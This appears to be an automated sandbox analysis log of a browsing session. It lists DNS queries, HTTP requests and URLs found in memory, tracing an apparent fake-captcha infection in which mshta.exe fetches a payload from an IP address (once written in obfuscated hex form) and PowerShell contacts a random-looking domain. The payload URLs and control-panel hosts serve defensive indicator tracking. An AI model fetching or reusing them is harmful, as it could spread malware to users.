Source: chromecache_168.1.dr	String found in binary or memory: that.instance.update()},hide:function(){this.isVisible=!1;this.update()},show:function(){this.isVisible=!0;this.update()},toggle:function(){this.isVisible=!this.isVisible;this.update()}});$(document).on({"onInit.fb":function(e,instance){var Thumbs;if(instance&&!instance.Thumbs){Thumbs=new FancyThumbs(instance);if(Thumbs.isActive&&Thumbs.opts.autoStart===!0){Thumbs.show()}}},"beforeShow.fb":function(e,instance,item,firstRun){var Thumbs=instance&&instance.Thumbs;if(Thumbs&&Thumbs.isVisible){Thumbs.focus(firstRun?0:250)}},"afterKeydown.fb":function(e,instance,current,keypress,keycode){var Thumbs=instance&&instance.Thumbs;if(Thumbs&&Thumbs.isActive&&keycode===71){keypress.preventDefault();Thumbs.toggle()}},"beforeClose.fb":function(e,instance){var Thumbs=instance&&instance.Thumbs;if(Thumbs&&Thumbs.isVisible&&Thumbs.opts.hideOnClose!==!1){Thumbs.$grid.hide()}}})})(document,jQuery);(function(document,$){"use strict";$.extend(!0,$.fancybox.defaults,{btnTpl:{share:'<button data-fancybox-share class="fancybox-button fancybox-button--share" title="{{SHARE}}">'+'<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M2.55 19c1.4-8.4 9.1-9.8 11.9-9.8V5l7 7-7 6.3v-3.5c-2.8 0-10.5 2.1-11.9 4.2z"/></svg>'+"</button>"},share:{url:function(instance,item){return((!instance.currentHash&&!(item.type==="inline"\|\|item.type==="html")?item.origSrc\|\|item.src:!1)\|\|window.location)},tpl:'<div class="fancybox-share">'+"<h1>{{SHARE}}</h1>"+"<p>"+'<a class="fancybox-share__button fancybox-share__button--fb" href="https://www.facebook.com/sharer/sharer.php?u={{url}}">'+'<svg viewBox="0 0 512 512" xmlns="http://www.w3.org/2000/svg"><path d="m287 456v-299c0-21 6-35 35-35h38v-63c-7-1-29-3-55-3-54 0-91 33-91 94v306m143-254h-205v72h196" /></svg>'+"<span>Facebook</span>"+"</a>"+'<a class="fancybox-share__button fancybox-share__button--tw" href="https://twitter.com/intent/tweet?url={{url}}&text={{descr}}">'+'<svg viewBox="0 0 512 512" xmlns="http://www.w3.org/2000/svg"><path d="m456 133c-14 7-31 11-47 13 17-10 30-27 37-46-15 10-34 16-52 20-61-62-157-7-141 75-68-3-129-35-169-85-22 37-11 86 26 109-13 0-26-4-37-9 0 39 28 72 65 80-12 3-25 4-37 2 10 33 41 57 77 57-42 30-77 38-122 34 170 111 378-32 359-208 16-11 30-25 41-42z" /></svg>'+"<span>Twitter</span>"+"</a>"+'<a class="fancybox-share__button fancybox-share__button--pt" href="https://www.pinterest.com/pin/create/button/?url={{url}}&description={{descr}}&media={{media}}">'+'<svg viewBox="0 0 512 512" xmlns="http://www.w3.org/2000/svg"><path d="m265 56c-109 0-164 78-164 144 0 39 15 74 47 87 5 2 10 0 12-5l4-19c2-6 1-8-3-13-9-11-15-25-15-45 0-58 43-110 113-110 62 0 96 38 96 88 0 67-30 122-73 122-24 0-42-19-36-44 6-29 20-60 20-81 0-19-10-35-31-35-25 0-44 26-44 60 0 21 7 36 7 36l-30 125c-8 37-1 83 0 87 0 3 4 4 5 2 2-3 32-39 42-75l16-64c8 16 31 29 56 29 74 0 124-67 124-157 0-69-58-132-146-132z" fill="#fff"/></svg>'+"<span>Pinterest</span>"+"</a>"+"</p>"+'<p><input class="fancybox-share__input" type="text" value="{{url_raw}}" o

Source: global traffic	DNS traffic detected: DNS query: thefatshallot.com
Source: global traffic	DNS traffic detected: DNS query: www.youtube.com
Source: global traffic	DNS traffic detected: DNS query: getfix.win
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: cptchdm.icu
Source: global traffic	DNS traffic detected: DNS query: tdsworkout.com
Source: global traffic	DNS traffic detected: DNS query: 2no.co
Source: global traffic	DNS traffic detected: DNS query: xpoalswwkjddsljsy.com
Source: global traffic	DNS traffic detected: DNS query: t.dtscout.com
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: whos.amung.us
Source: global traffic	DNS traffic detected: DNS query: cdn.tynt.com
Source: global traffic	DNS traffic detected: DNS query: ic.tynt.com
Source: global traffic	DNS traffic detected: DNS query: de.tynt.com
Source: global traffic	DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: xoiiasdpsdoasdpojas.com

Source: unknown

HTTP traffic detected: POST /r-pannel/stats.php?action=visit&folder= HTTP/1.1Host: xpoalswwkjddsljsy.comConnection: keep-aliveContent-Length: 23sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: application/jsonsec-ch-ua-mobile: ?0Accept: */*Origin: https://xpoalswwkjddsljsy.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://xpoalswwkjddsljsy.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: visit=1

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbiddendate: Fri, 17 Oct 2025 06:51:39 GMTcontent-type: text/html; charset=UTF-8accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UAcf-mitigated: challengecritical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UAcross-origin-embedder-policy: require-corpcross-origin-opener-policy: same-origincross-origin-resource-policy: same-originorigin-agent-cluster: ?1permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()referrer-policy: same-originserver-timing: chlray;desc="98fdde63be1629a7"x-content-type-options: nosniffx-frame-options: SAMEORIGINcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0expires: Thu, 01 Jan 1970 00:00:01 GMTreport-to: {"endpoints":[{"url"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 17 Oct 2025 06:51:41 GMTServer: Apache/2.4.52 (Ubuntu)Content-Length: 284Keep-Alive: timeout=5, max=95Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 17 Oct 2025 06:51:41 GMTServer: Apache/2.4.52 (Ubuntu)Content-Length: 284Keep-Alive: timeout=5, max=94Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 17 Oct 2025 06:51:42 GMTServer: Apache/2.4.52 (Ubuntu)Content-Length: 284Keep-Alive: timeout=5, max=93Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 17 Oct 2025 06:51:43 GMTServer: Apache/2.4.52 (Ubuntu)Content-Length: 284Keep-Alive: timeout=5, max=92Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 17 Oct 2025 06:51:43 GMTServer: Apache/2.4.52 (Ubuntu)Content-Length: 284Keep-Alive: timeout=5, max=91Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 17 Oct 2025 06:52:02 GMTServer: Apache/2.4.52 (Ubuntu)Content-Length: 284Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 17 Oct 2025 06:52:06 GMTServer: Apache/2.4.52 (Ubuntu)Content-Length: 284Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 17 Oct 2025 06:52:13 GMTServer: Apache/2.4.52 (Ubuntu)Content-Length: 284Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 17 Oct 2025 06:52:23 GMTServer: Apache/2.4.52 (Ubuntu)Content-Length: 284Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 17 Oct 2025 06:52:24 GMTServer: Apache/2.4.52 (Ubuntu)Content-Length: 284Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 17 Oct 2025 06:52:28 GMTServer: Apache/2.4.52 (Ubuntu)Content-Length: 284Keep-Alive: timeout=5, max=98Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 17 Oct 2025 06:52:36 GMTServer: Apache/2.4.52 (Ubuntu)Content-Length: 284Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1

Source: mshta.exe, 00000015.00000002.1974671308.0000021CAE5D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000015.00000002.1973367618.00000214A7A1E000.00000004.00000020.00020000.00000000.sdmp, chromecache_203.1.dr	String found in binary or memory: http://141.0x62.80.175/rtdx.dat
Source: mshta.exe, 00000015.00000002.1973367618.00000214A7A10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://141.0x62.80.175/rtdx.datC:
Source: mshta.exe, 00000015.00000002.1969562461.00000214A79B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://141.0x62.80.175/rtdx.datEP$
Source: mshta.exe, 00000015.00000002.1973215792.00000214A79C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://141.0x62.80.175/rtdx.datH
Source: mshta.exe, 00000015.00000002.1973367618.00000214A7A1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://141.0x62.80.175/rtdx.datQ
Source: mshta.exe, 00000015.00000003.1946884279.00000214A7AFB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000015.00000003.1963409158.00000214A7AFB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000015.00000003.1941804849.00000214A7AFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://141.98.80.1
Source: mshta.exe, 00000015.00000003.1941804849.00000214A7A4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://141.98.80.175/rtdx.dat
Source: mshta.exe, 00000015.00000002.1973367618.00000214A7A1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://141.98.80.175/rtdx.dat-1-0
Source: mshta.exe, 00000015.00000003.1941804849.00000214A7A83000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000015.00000002.1973546647.00000214A7A9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://141.98.80.175/rtdx.dat...%
Source: mshta.exe, 00000015.00000003.1941804849.00000214A7A83000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000015.00000002.1973546647.00000214A7A9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://141.98.80.175/rtdx.dat...r
Source: mshta.exe, 00000015.00000002.1973546647.00000214A7A50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000015.00000003.1941804849.00000214A7A4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://141.98.80.175/rtdx.dat3ws
Source: mshta.exe, 00000015.00000002.1973367618.00000214A7A1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://141.98.80.175/rtdx.dat;
Source: mshta.exe, 00000015.00000003.1941804849.00000214A7A4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://141.98.80.175/rtdx.datPPC:
Source: mshta.exe, 00000015.00000003.1941804849.00000214A7A83000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000015.00000002.1973546647.00000214A7A9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://141.98.80.175/rtdx.datctiveEventdowsINetCookies
Source: mshta.exe, 00000015.00000003.1948990933.0000021CA9845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://141.98.80.175/rtdx.dathttp://141.98.80.175/rtdx.dat
Source: mshta.exe, 00000015.00000002.1973367618.00000214A7A1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://141.98.80.175/rtdx.datx
Source: mshta.exe, 00000015.00000002.1973367618.00000214A7A1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://141.98.80.175/rtdx.dat~
Source: chromecache_167.1.dr	String found in binary or memory: http://api.jquery.com/jQuery.browser
Source: powershell.exe, 00000016.00000002.2002117152.0000021C5BF75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: chromecache_198.1.dr	String found in binary or memory: http://labs.rampinteractive.co.uk/touchSwipe/
Source: chromecache_171.1.dr, chromecache_195.1.dr	String found in binary or memory: http://ns.attribution.com/ads/1.0/
Source: powershell.exe, 00000016.00000002.2000250119.0000021C53A83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2000250119.0000021C53BC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1990241947.0000021C45404000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000016.00000002.1990241947.0000021C43C4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: chromecache_168.1.dr	String found in binary or memory: http://pinterest.com/pin/create/button/?url=
Source: chromecache_198.1.dr	String found in binary or memory: http://plugins.jquery.com/project/touchSwipe
Source: powershell.exe, 00000016.00000002.1990241947.0000021C43A21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: chromecache_168.1.dr	String found in binary or memory: http://sixtwothree.org)
Source: chromecache_168.1.dr	String found in binary or memory: http://twitter.com/intent/tweet?text=
Source: powershell.exe, 00000016.00000002.1990241947.0000021C43C4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: chromecache_164.1.dr, chromecache_176.1.dr	String found in binary or memory: http://www.gimp.org/xmp/
Source: chromecache_198.1.dr	String found in binary or memory: http://www.github.com/mattbryson
Source: chromecache_189.1.dr	String found in binary or memory: http://www.insertmarketinghere.com/story/
Source: chromecache_189.1.dr	String found in binary or memory: http://www.instagram.com/thefatshallot
Source: powershell.exe, 00000016.00000002.1990241947.0000021C44B8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1990241947.0000021C45052000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1990241947.0000021C43C4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xoiiasdpsdoasdpojas.com
Source: powershell.exe, 00000016.00000002.1989928575.0000021C42050000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1990110470.0000021C42110000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xoiiasdpsdoasdpojas.com)
Source: powershell.exe, 00000016.00000002.1989629313.0000021C41FB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xoiiasdpsdoasdpojas.com)2$
Source: powershell.exe, 00000016.00000002.1989629313.0000021C41FB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xoiiasdpsdoasdpojas.com)E
Source: powershell.exe, 00000016.00000002.1990241947.0000021C43A21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xoiiasdpsdoasdpojas.com)p
Source: powershell.exe, 00000016.00000002.1990241947.0000021C44B8A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xoiiasdpsdoasdpojas.com/
Source: powershell.exe, 00000016.00000002.1990241947.0000021C44B8A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xoiiasdpsdoasdpojas.com/p
Source: powershell.exe, 00000016.00000002.1990241947.0000021C43C4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xoiiasdpsdoasdpojas.comX9
Source: chromecache_148.1.dr	String found in binary or memory: https://2no.co/1uzGZ4
Source: chromecache_203.1.dr	String found in binary or memory: https://ads.bravvoks.com/3a049e5/postback?subid=$
Source: powershell.exe, 00000016.00000002.1990241947.0000021C43A21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: chromecache_205.1.dr	String found in binary or memory: https://api.flickr.com/services/rest/?format=json&method=
Source: chromecache_203.1.dr	String found in binary or memory: https://api.ipify.org?format=json
Source: chromecache_189.1.dr	String found in binary or memory: https://api.w.org/
Source: powershell.exe, 00000016.00000002.1990241947.0000021C45404000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000016.00000002.1990241947.0000021C45404000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000016.00000002.1990241947.0000021C45404000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: chromecache_189.1.dr	String found in binary or memory: https://direct.chownow.com/order/20536/locations/44423
Source: chromecache_158.1.dr	String found in binary or memory: https://f.fontdeck.com/s/css/js/
Source: chromecache_158.1.dr	String found in binary or memory: https://fast.fonts.net/jsapi
Source: chromecache_189.1.dr	String found in binary or memory: https://fatshallotorders.square.site/
Source: chromecache_189.1.dr	String found in binary or memory: https://fonts.googleapis.com
Source: chromecache_158.1.dr	String found in binary or memory: https://fonts.googleapis.com/css
Source: chromecache_189.1.dr	String found in binary or memory: https://fonts.googleapis.com/css?family=Noto%20Sans%3A100italic%2C200italic%2C300italic%2C400italic%
Source: chromecache_169.1.dr	String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: chromecache_189.1.dr	String found in binary or memory: https://fonts.gstatic.com
Source: chromecache_148.1.dr	String found in binary or memory: https://fonts.gstatic.com/
Source: chromecache_165.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/notosans/v42/o-0ZIpQlx3QUlC5A4PNr4C5OaxRsfNNlKbCePevtt3OmDyw.woff2)
Source: chromecache_165.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/notosans/v42/o-0ZIpQlx3QUlC5A4PNr4C5OaxRsfNNlKbCePevttHOmDyw.woff2)
Source: chromecache_165.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/notosans/v42/o-0ZIpQlx3QUlC5A4PNr4C5OaxRsfNNlKbCePevttXOmDyw.woff2)
Source: chromecache_165.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/notosans/v42/o-0ZIpQlx3QUlC5A4PNr4C5OaxRsfNNlKbCePevttnOmDyw.woff2)
Source: chromecache_165.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/notosans/v42/o-0ZIpQlx3QUlC5A4PNr4C5OaxRsfNNlKbCePevtuHOmDyw.woff2)
Source: chromecache_165.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/notosans/v42/o-0ZIpQlx3QUlC5A4PNr4C5OaxRsfNNlKbCePevtuXOm.woff2)
Source: chromecache_165.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/notosans/v42/o-0ZIpQlx3QUlC5A4PNr4C5OaxRsfNNlKbCePevtunOmDyw.woff2)
Source: chromecache_165.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/notosans/v42/o-0ZIpQlx3QUlC5A4PNr4C5OaxRsfNNlKbCePevtvXOmDyw.woff2)
Source: chromecache_165.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/notosans/v42/o-0bIpQlx3QUlC5A4PNB6Ryti20_6n1iPHjc5a3du2ui.woff2)
Source: chromecache_189.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/notosans/v42/o-0bIpQlx3QUlC5A4PNB6Ryti20_6n1iPHjc5a7duw.woff2
Source: chromecache_165.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/notosans/v42/o-0bIpQlx3QUlC5A4PNB6Ryti20_6n1iPHjc5a7duw.woff2)
Source: chromecache_165.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/notosans/v42/o-0bIpQlx3QUlC5A4PNB6Ryti20_6n1iPHjc5aDdu2ui.woff2)
Source: chromecache_165.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/notosans/v42/o-0bIpQlx3QUlC5A4PNB6Ryti20_6n1iPHjc5aHdu2ui.woff2)
Source: chromecache_165.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/notosans/v42/o-0bIpQlx3QUlC5A4PNB6Ryti20_6n1iPHjc5aLdu2ui.woff2)
Source: chromecache_165.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/notosans/v42/o-0bIpQlx3QUlC5A4PNB6Ryti20_6n1iPHjc5aPdu2ui.woff2)
Source: chromecache_165.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/notosans/v42/o-0bIpQlx3QUlC5A4PNB6Ryti20_6n1iPHjc5a_du2ui.woff2)
Source: chromecache_165.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/notosans/v42/o-0bIpQlx3QUlC5A4PNB6Ryti20_6n1iPHjc5ardu2ui.woff2)
Source: chromecache_199.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v44/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqW106F15M.woff2)
Source: chromecache_199.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v44/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqWt06F15M.woff2)
Source: chromecache_199.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v44/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqWtE6F15M.woff2)
Source: chromecache_199.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v44/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqWtU6F15M.woff2)
Source: chromecache_199.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v44/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqWtk6F15M.woff2)
Source: chromecache_199.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v44/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqWu06F15M.woff2)
Source: chromecache_189.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v44/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqWuU6F.woff2
Source: chromecache_199.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v44/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqWuU6F.woff2)
Source: chromecache_199.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v44/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqWuk6F15M.woff2)
Source: chromecache_199.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v44/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqWvU6F15M.woff2)
Source: chromecache_199.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v44/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqWxU6F15M.woff2)
Source: chromecache_189.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v44/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTS-muw.woff2
Source: chromecache_199.1.dr, chromecache_209.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v44/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTS-muw.woff2)
Source: chromecache_199.1.dr, chromecache_209.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v44/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTS2mu1aB.woff2)
Source: chromecache_199.1.dr, chromecache_209.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v44/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSCmu1aB.woff2)
Source: chromecache_199.1.dr, chromecache_209.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v44/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSGmu1aB.woff2)
Source: chromecache_199.1.dr, chromecache_209.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v44/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSKmu1aB.woff2)
Source: chromecache_199.1.dr, chromecache_209.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v44/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSOmu1aB.woff2)
Source: chromecache_199.1.dr, chromecache_209.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v44/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSumu1aB.woff2)
Source: chromecache_199.1.dr, chromecache_209.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v44/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSymu1aB.woff2)
Source: chromecache_199.1.dr, chromecache_209.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v44/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTUGmu1aB.woff2)
Source: chromecache_199.1.dr, chromecache_209.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/opensans/v44/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTVOmu1aB.woff2)
Source: chromecache_199.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/pacifico/v23/FwZY7-Qmy14u9lezJ-6D6MmTpA.woff2)
Source: chromecache_189.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/pacifico/v23/FwZY7-Qmy14u9lezJ-6H6Mk.woff2
Source: chromecache_199.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/pacifico/v23/FwZY7-Qmy14u9lezJ-6H6Mk.woff2)
Source: chromecache_199.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/pacifico/v23/FwZY7-Qmy14u9lezJ-6I6MmTpA.woff2)
Source: chromecache_199.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/pacifico/v23/FwZY7-Qmy14u9lezJ-6J6MmTpA.woff2)
Source: chromecache_199.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/pacifico/v23/FwZY7-Qmy14u9lezJ-6K6MmTpA.woff2)
Source: chromecache_173.1.dr	String found in binary or memory: https://getbootstrap.com/)
Source: chromecache_189.1.dr	String found in binary or memory: https://getfix.win/jsrepo?rnd=
Source: chromecache_148.1.dr	String found in binary or memory: https://gettrumpmemes.gettrumpmemestrendingtokens.com/images/1389676a4641ef8e3b4790cf06063249d411a69
Source: chromecache_148.1.dr	String found in binary or memory: https://gettrumpmemes.gettrumpmemestrendingtokens.com/images/39676ea0b0640b4db29d0f93845d702b3784985
Source: chromecache_148.1.dr	String found in binary or memory: https://gettrumpmemes.gettrumpmemestrendingtokens.com/images/750146d79df2f7e02b6895527d982b4de952ab9
Source: chromecache_148.1.dr	String found in binary or memory: https://gettrumpmemes.gettrumpmemestrendingtokens.com/images/ca03486f14ec38cd5ed6377fe6f56c1a5713a44
Source: chromecache_168.1.dr	String found in binary or memory: https://github.com/Modernizr/Modernizr/issues/372#issuecomment-3112695
Source: powershell.exe, 00000016.00000002.1990241947.0000021C43C4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: chromecache_168.1.dr	String found in binary or memory: https://github.com/jgarber623/javascript-debounce
Source: chromecache_189.1.dr	String found in binary or memory: https://github.com/js-cookie/js-cookie
Source: chromecache_198.1.dr	String found in binary or memory: https://github.com/mattbryson/TouchSwipe-Jquery-Plugin
Source: chromecache_173.1.dr	String found in binary or memory: https://github.com/twbs/bootstrap/blob/main/LICENSE)
Source: powershell.exe, 00000016.00000002.1990241947.0000021C44B8A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: chromecache_168.1.dr	String found in binary or memory: https://goo.gl/OGw5Gm
Source: chromecache_205.1.dr	String found in binary or memory: https://goo.gl/ku3NgH
Source: chromecache_198.1.dr	String found in binary or memory: https://greensock.com
Source: chromecache_198.1.dr	String found in binary or memory: https://greensock.com/standard-license
Source: chromecache_189.1.dr	String found in binary or memory: https://i.ytimg.com/vi/ID/hqdefault.jpg
Source: chromecache_168.1.dr	String found in binary or memory: https://img.youtube.com/vi/$4/hqdefault.jpg
